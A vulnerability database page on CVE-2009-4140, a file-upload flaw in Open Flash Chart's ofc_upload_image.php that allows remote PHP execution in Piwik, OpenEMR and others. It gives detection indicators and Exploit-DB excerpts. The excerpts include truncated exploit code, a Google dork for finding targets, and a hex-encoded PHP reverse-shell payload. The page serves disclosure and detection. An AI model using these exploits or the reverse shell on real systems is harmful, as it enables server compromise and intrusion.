CVE-2009-4140
published 2009-12-22CVE-2009-4140: Unrestricted file upload vulnerability in ofc_upload_image.php in Open Flash Chart v2 Beta 1 through v2 Lug Wyrm Charmer, as used in Piwik 0.2.35 through…
PriorityP275high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
75.84%
99.5th percentile
Unrestricted file upload vulnerability in ofc_upload_image.php in Open Flash Chart v2 Beta 1 through v2 Lug Wyrm Charmer, as used in Piwik 0.2.35 through 0.4.3, Woopra Analytics Plugin before 1.4.3.2, and possibly other products, when register_globals is enabled, allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension through the name parameter with the code in the HTTP_RAW_POST_DATA parameter, then accessing it via a direct request to the file in tmp-upload-images/.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | matomo | — | — |
| matomo | matomo | — | — |
| matomo | matomo | — | — |
| matomo | matomo | — | — |
| teethgrinder.co.uk | open_flash_chart | — | — |
Detection & IOCsextracted from sources · hover to see the quote
pathadministrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php↗
- →Detect POST requests to ofc_upload_image.php with a 'name' parameter containing a .php extension — this is the upload vector for arbitrary PHP file creation. ↗
- →Monitor GET requests to tmp-upload-images/ directory for .php file execution following a POST to ofc_upload_image.php — this two-step pattern (upload then execute) is the exploitation sequence. ↗
- →Alert on HTTP response bodies containing 'Saving your image to' from ofc_upload_image.php — this string confirms the vulnerable component is present and active. ↗
- →Flag POST requests where Content-Type is 'text/plain' directed at ofc_upload_image.php — exploits use this non-standard content type to deliver raw PHP payload via HTTP_RAW_POST_DATA. ↗
- →Use the Google dork to identify exposed instances: search for the OpenFlashChart path under Joomla CiviCRM installations. ↗
- ·The vulnerability is only exploitable when PHP's register_globals is enabled — systems with register_globals disabled are not affected by this specific attack vector. ↗
- ·The OpenEMR variant of this vulnerability requires no authentication, unlike the base CVE which requires authenticated users — detection rules should account for both authenticated and unauthenticated exploitation attempts depending on the target application. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2009-4140: matomo - Unrestricted file upload vulnerability in ofc_upload_image.php in Open Flash Cha...
vendor_debian·2009·CVSS 7.5
CVE-2009-4140 [HIGH] CVE-2009-4140: matomo - Unrestricted file upload vulnerability in ofc_upload_image.php in Open Flash Cha...
Unrestricted file upload vulnerability in ofc_upload_image.php in Open Flash Chart v2 Beta 1 through v2 Lug Wyrm Charmer, as used in Piwik 0.2.35 through 0.4.3, Woopra Analytics Plugin before 1.4.3.2, and possibly other products, when register_globals is enabled, allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension through the name parameter with the code in the HTTP_RAW_POST_DATA parameter, then accessing it via a direct request to the file in tmp-upload-images/.
Scope: local
sid: resolved
trixie: resolved
GHSA
GHSA-x396-wp63-mv42: Unrestricted file upload vulnerability in ofc_upload_image
ghsa_unreviewed·2022-05-02
CVE-2009-4140 [HIGH] GHSA-x396-wp63-mv42: Unrestricted file upload vulnerability in ofc_upload_image
Unrestricted file upload vulnerability in ofc_upload_image.php in Open Flash Chart v2 Beta 1 through v2 Lug Wyrm Charmer, as used in Piwik 0.2.35 through 0.4.3, Woopra Analytics Plugin before 1.4.3.2, and possibly other products, when register_globals is enabled, allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension through the name parameter with the code in the HTTP_RAW_POST_DATA parameter, then accessing it via a direct request to the file in tmp-upload-images/.
VulnCheck
teethgrinder.co.uk open_flash_chart Unrestricted Upload of File with Dangerous Type
vulncheck·2009·CVSS 7.5
CVE-2009-4140 [HIGH] teethgrinder.co.uk open_flash_chart Unrestricted Upload of File with Dangerous Type
teethgrinder.co.uk open_flash_chart Unrestricted Upload of File with Dangerous Type
Unrestricted file upload vulnerability in ofc_upload_image.php in Open Flash Chart v2 Beta 1 through v2 Lug Wyrm Charmer, as used in Piwik 0.2.35 through 0.4.3, Woopra Analytics Plugin before 1.4.3.2, and possibly other products, when register_globals is enabled, allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension through the name parameter with the code in the HTTP_RAW_POST_DATA parameter, then accessing it via a direct request to the file in tmp-upload-images/.
Affected: teethgrinder.co.uk open_flash_chart
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are
No detection rules found.
Exploit-DB
Open Flash Chart 2 - Arbitrary File Upload (Metasploit)
exploitdb·2013-10-26
CVE-2011-4275 Open Flash Chart 2 - Arbitrary File Upload (Metasploit)
Open Flash Chart 2 - Arbitrary File Upload (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "Open Flash Chart v2 Arbitrary File Upload",
'Description' => %q{
This module exploits a file upload vulnerability found in Open Flash
Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file
in order to upload and execute malicious PHP files.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Braeden Thomas', # Initial discovery + Piwik PoC
'Gjoko Krstic ', # OpenEMR PoC
'Halim Cruzito', # zonPHP PoC
'Brendan Coles ' # Metasploit
],
'References' =>
[
['BID', '37314'],
['CVE', '2009-4140'],
['OSVDB', '59051'],
['EDB', '10532']
],
'Payload' =>
{
'Space'
Exploit-DB
ZonPHP 2.25 - Remote Code Execution
exploitdb·2013-10-20
CVE-2011-4275 ZonPHP 2.25 - Remote Code Execution
ZonPHP 2.25 - Remote Code Execution
---
# Exploit Title: ZonPHP V2.25 RCE Vulnerability
# Google Dork: intext:"Made by SLAPER"
# Date: 21-10-2013
# Exploit Author: Halim Cruzito
# Vendor Homepage: http://www.slaper.be
# Software Link: http://www.slaper.be/zonPHPv225.zip
# Version: v2.25
# Tested on: Windows 7
# PoC:
";
$headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",�
"Content-Type: text/plain");
$rc = curl_init();
curl_setopt($rc, CURLOPT_URL, $url.$path.$filename);
curl_setopt($rc, CURLOPT_HTTPHEADER, $headers);
curl_setopt($rc, CURLOPT_POST, 1);
curl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($rc, CURLOPT_POSTFIELDS, $data);
curl_setopt($rc, CURLOPT_RETURNTRANSFER, 1);
$ex = curl_exec($rc);
curl_close($rc);�
$shell
Exploit-DB
Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
exploitdb·2013-04-22
CVE-2011-4275 Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
---
# Exploit Title: joomla component com_civicrm remode code injection exploit
# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org
exp.php -u http://target.com/ -f post.php
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
die("\n Usage example: php jnews.php -u http://target.com/ -f post.php\n
-u http://target.com/ The full path to Joomla!
-f post.php The name of the file to create.\n");
$url = $options['u'];
$fi
Exploit-DB
OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)
exploitdb·2013-02-20
CVE-2011-4275 OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)
OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "OpenEMR PHP File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the
ofc_upload_image.php file from the openflashchart library, a malicious user can
upload a file to the tmp-upload-images directory without any authentication, which
results in arbitrary code execution. The module has been tested successfully on
OpenEMR 4.1.1 over Ubuntu 10.04.
},
'License' => MSF_LICENSE,
'Auth
Exploit-DB
OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload
exploitdb·2013-02-13
CVE-2011-4275 OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload
OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload
---
$errstr ($errno)\n";
die();
}
function r_shell($sc)
{
for($z = 0; $z Usage: php $argv[0] \n\n";
die();
}
$pl = r_shell("3c3f7068700d0a". "7365745f74696d". "655f6c696d6974".
"202830293b0d0a". "246970203d2027". "3132372e302e30".
"2e31273b0d0a24". "706f7274203d20". "313233343b0d0a".
"246368756e6b5f". "73697a65203d20". "313430303b0d0a".
"2477726974655f". "61203d206e756c". "6c3b2024657272".
"6f725f61203d20". "6e756c6c3b0d0a". "247368656c6c20".
"3d2027756e616d". "65202d613b2077". "3b2069643b202f".
"62696e2f736820". "2d69273b0d0a24".
"6461656d6f6e20". "3d20303b202464".
"65627567203d20". "303b0d0a696620".
"2866756e637469". "6f6e5f65786973".
"7473282770636e". "746c5f666f726b".
"272929207b0d0a". "24706964203d20".
"70636e746c5f66
Exploit-DB
Piwik Open Flash Chart - Remote Code Execution
exploitdb·2009-12-17
CVE-2011-4275 Piwik Open Flash Chart - Remote Code Execution
Piwik Open Flash Chart - Remote Code Execution
---
Bugtraq ID: 37314
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Dec 14 2009 12:00AM
Updated: Dec 17 2009 06:03PM
Credit: Braeden Thomas
Vulnerable: Piwik Piwik 0.4.3
Piwik Piwik 0.4.2
Piwik Piwik 0.4.1
Piwik Piwik 0.4
Piwik Piwik 0.2.37
Piwik Piwik 0.2.36
Piwik Piwik 0.2.35
Open Web Analytics Open Web Analytics 1.2.0
Open Flash Chart Open Flash Chart 2.0
Open Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also
Metasploit
Open Flash Chart v2 Arbitrary File Upload
metasploit
Open Flash Chart v2 Arbitrary File Upload
Open Flash Chart v2 Arbitrary File Upload
This module exploits a file upload vulnerability found in Open Flash Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file in order to upload and execute malicious PHP files.
Metasploit
OpenEMR PHP File Upload Vulnerability
metasploit
OpenEMR PHP File Upload Vulnerability
OpenEMR PHP File Upload Vulnerability
This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the ofc_upload_image.php file from the openflashchart library, a malicious user can upload a file to the tmp-upload-images directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on OpenEMR 4.1.1 over Ubuntu 10.04.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/123493/wpseowatcher-exec.txthttp://packetstormsecurity.com/files/123494/wpslimstatex-exec.txthttp://packetstormsecurity.org/0910-exploits/piwik-upload.txthttp://piwik.org/blog/2009/10/piwik-response-to-secunia-advisory-sa37078/http://secunia.com/advisories/37078http://secunia.com/advisories/37911http://secunia.com/advisories/55160http://secunia.com/advisories/55162http://wordpress.org/extend/plugins/woopra/changelog/http://www.exploit-db.com/exploits/24969http://www.openwall.com/lists/oss-security/2009/12/14/1http://www.openwall.com/lists/oss-security/2009/12/14/3http://www.osvdb.org/59051http://www.securityfocus.com/bid/37314http://www.vupen.com/english/advisories/2009/2966https://exchange.xforce.ibmcloud.com/vulnerabilities/53825http://packetstormsecurity.com/files/123493/wpseowatcher-exec.txthttp://packetstormsecurity.com/files/123494/wpslimstatex-exec.txthttp://packetstormsecurity.org/0910-exploits/piwik-upload.txthttp://piwik.org/blog/2009/10/piwik-response-to-secunia-advisory-sa37078/http://secunia.com/advisories/37078http://secunia.com/advisories/37911http://secunia.com/advisories/55160http://secunia.com/advisories/55162http://wordpress.org/extend/plugins/woopra/changelog/http://www.exploit-db.com/exploits/24969http://www.openwall.com/lists/oss-security/2009/12/14/1http://www.openwall.com/lists/oss-security/2009/12/14/3http://www.osvdb.org/59051http://www.securityfocus.com/bid/37314http://www.vupen.com/english/advisories/2009/2966https://exchange.xforce.ibmcloud.com/vulnerabilities/53825
2009-12-22
Published
Exploited in the wild